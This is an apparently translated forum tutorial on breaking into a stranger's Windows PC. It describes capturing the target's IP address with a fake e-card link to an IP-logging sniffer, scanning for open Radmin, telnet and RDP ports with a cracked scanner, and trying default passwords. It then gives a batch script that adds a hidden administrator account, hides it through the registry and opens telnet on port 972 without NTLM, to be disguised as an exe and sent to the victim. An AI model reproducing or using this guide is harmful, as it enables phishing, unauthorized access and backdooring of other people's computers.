Hacking a PC by IP

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1.) Preface.

In order to use this method, you need to decide whether you really need it, or whether you just want to entertain yourself and prove that you are the best. The latter was an incentive for me to do all this, but now I understand a lot, and most importantly, I understand that hacking should not be done to prove to people around you that you are a "coolhacker". What I don't think I am. There is a lot to learn, and after practice, if everything worked out, in my opinion, it is not necessary to hack other people's computers for nothing to do. So, I hope everyone has decided on the goal, let's move on to action?


2.) Find out the IP address.

I hope it's no secret that without an IP address, we will not be able to find the computer we need, and therefore-to conduct hacking. So how do you recognize it? (many people ask this question and often write to me on ICQ). Very simple, we will need straight hands, a little imagination and an online sniffer.

Many people use a sniffer to steal cookies (cookies, cookies, sessions — as you like). But in our case, we are not interested in cookies. We go here and register if we haven't done so before.


Excellent. Half the job is done. Now go to "settings", if necessary, upload your image. And we are given a link to the sniffer, with a redirect (redirection) to our image. Don't forget to check the box on "write IP to log". I hope you understand what I mean? No?! Then read it.

The point is to give this link to your "victim", but only with the link hidden in the word (we study html), and if you scrap it, then just take it:

Write any text or one word here

Write some text (use your imagination). Let's take the simplest one:


Hello! A postcard was sent to your E-mail address. To view it, click here


This was the easiest, I advise you to come up with something more original. You send all this stuff to the victim. If you want, you can use anonymous mail sending services, or fill in a php script and make such a service yourself. You can use mine, but I can disable it at any time:


All that remains is for the victim to GO to "view the picture", as the IP is burned in the log.

You don't need to enter anything anywhere, as in the case of a fake. In the end, everyone is happy, he (she) received his / her card, and you are happy.


3.) We use different programs for data analysis.

Now, we have the main thing, without which further work would be impossible. Next steps-check the host (computer) check for vulnerabilities — open ports. I use the [XSpider 7.5] scanner for this purpose, you can use any other one that suits your taste. But it is best to use several scanners, which will not show one — will show the other.

Immediately download [XSpider 7.5] from here —
You do not have permission to view link Log in or register now.

I don't recommend updating it, as the version is cracked and fully functional.

Now that you have downloaded it, you need to configure it — create a new profile. Someone on the site described setting up a profile, but so that you don't have to search for an article, I'll describe the setting for you.

Open the scanner



>> > > > > Comment (write whatever you want)

>>> > > >Go to the "Port Scanner" tab, and at the bottom, next to the "default.prt" label, press [...]

>>>A window will appear, press "new"


>>>Write anything in the comments section

> > > > > > see "add ports" at the bottom and write "4899" and "3389"

>>>> > > Save as "4899".

> > > > > > Go back to the tabs for longer, and remove the checkboxes from everywhere.

Similarly, you create 1 more profile, only port 23. That's all.

Now you type your victim's IP in the "add host" field and start scanning. If one of the ports 4899 — Radmin, 23 — telnet, 3389 — Remote Desktop (remote desktop) is suddenly open, try connecting (connecting). The default password is 12345678, as already mentioned. The best thing (for me) is when port 4899 (Radmin) is open. Connected? Rejoice!

Then you can do whatever your heart desires. You don't have to read any further.

But in order not to get burned, I recommend that you remove the icon in the tray (next to the clock), and create a new user with administrator rights. (this, by the way, was also written earlier) — I will not write, otherwise the article will be very large.

Remote Desktop is included as standard with Windows.

You can download RAdmin Viewer here — depositfiles.com/files/92m5usz2b

It also has telnet


RAdmin is also included as standard.

If you can't connect, don't despair, read on.


4.) If the analysis did not give anything?

If he did not give anything, then you can help yourself with your own efforts. This is done simply, the server part is installed on a remote computer/opens the required port with the required username and password. Sure, but how do I install it?/open it if the computer is far away???

— What is the Internet for?? WWW — World Wide Web — THE WORLD WIDE Web.

Via the Internet, you can also install the program on someone else's computer/or open access to an existing one.

Radmin, if anything, also comes as standard with Windows. And you can use the same scanner to determine that this is really Windows. This means that we can only open access to this service (23). This was also taken care of before us, and we wrote such a*. txt file, which is later renamed to*. bat.

Then another file is created, the registry configuration file, which hides the new user from view, and it is not visible in the welcome window.

content *.bat file


chcp 1251

net user SUPPORT_388945a0 /delete

net user restot 12345678 /add

net localgroup Administrators restot /add

net localgroup Users SUPPORT_388945a0 /del

regedit /s conf.reg

sc config tlntsvr start= auto

tlntadmn config port=972 sec=-NTLM

net start Telnet


With this file, you create a new user named restot and password 12345678

import settings to the registry that will hide your name in the welcome window.

open port 972 and activate telnet through it.

It is written without pluses in notepad, then the extension is changed to*. bat

now the contents of the conf.reg file


Windows Registry Editor Version 5.00


NTCurrentVersionWinlogonSpecialAccountsUserLis t]



In the last line, in quotation marks, write the name that you specified in the*. bat file.

also write it down in notepad, and then change the extension to*. reg

you save all this in one folder, you can simply archive both files into one archive, or you can do something smarter, compile the file *.bat to the*. exe file, and also add to the archive by changing the icon, read about this in the articles on the portal. After the victim starts the batch file, it will be possible to connect to port 972, or to any other port, as long as it is not busy...

then you can install what you need through the Telnet service, and more comfortably manage the remote machine.


5.) A brief biography|||

find the victim > > > > > > find out the ip address >>>>>>>>>>>>>>> checking for open ports >>>>>>>>>>>>>>>>>>>>>>>> open ports (if there were no open ones) >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> install via telnet what you need for convenience >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> carrying out your evil plan…
